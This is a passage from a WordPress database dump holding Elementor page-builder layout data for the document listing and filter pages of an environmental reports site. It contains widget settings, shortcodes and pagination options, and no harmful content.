Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":56.914},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26088,3845,'_elementor_edit_mode','builder'),(26089,3845,'_elementor_template_type','loop'),(26090,3845,'_elementor_version','3.4.0'),(26091,3845,'_elementor_pro_version','3.3.6'),(26092,3845,'_wp_page_template','default'),(26093,3845,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26094,3845,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.919},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":56.914},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26288,3850,'_elementor_edit_mode','builder'),(26289,3850,'_elementor_template_type','wp-page'),(26290,3850,'_elementor_version','3.4.0'),(26291,3850,'_wp_page_template','default'),(26292,3850,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26294,3850,'_elementor_pro_version','3.3.6'),(26295,3851,'_elementor_edit_mode','builder'),(26296,3851,'_elementor_template_type','wp-page'),(26297,3851,'_elementor_version','3.4.0'),(26298,3851,'_wp_page_template','default'),(26299,3851,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26301,3851,'_elementor_pro_version','3.3.6'),(26302,3852,'_elementor_edit_mode','builder'),(26303,3852,'_elementor_template_type','wp-page'),(26304,3852,'_elementor_version','3.4.0'),(26305,3852,'_wp_page_template','default'),(26306,3852,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26308,3852,'_elementor_pro_version','3.3.6'),(26310,3853,'_elementor_edit_mode','builder'),(26311,3853,'_elementor_template_type','wp-page'),(26312,3853,'_elementor_version','3.4.0'),(26313,3853,'_wp_page_template','default'),(26314,3853,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26316,3853,'_elementor_pro_version','3.3.6'),(26317,3854,'_elementor_edit_mode','builder'),(26318,3854,'_elementor_template_type','wp-page'),(26319,3854,'_elementor_version','3.4.0'),(26320,3854,'_wp_page_template','default'),(26321,3854,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26323,3854,'_elementor_pro_version','3.3.6'),(26324,3855,'_elementor_edit_mode','builder'),(26325,3855,'_elementor_template_type','wp-page'),(26326,3855,'_elementor_version','3.4.0'),(26327,3855,'_wp_page_template','default'),(26328,3855,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some 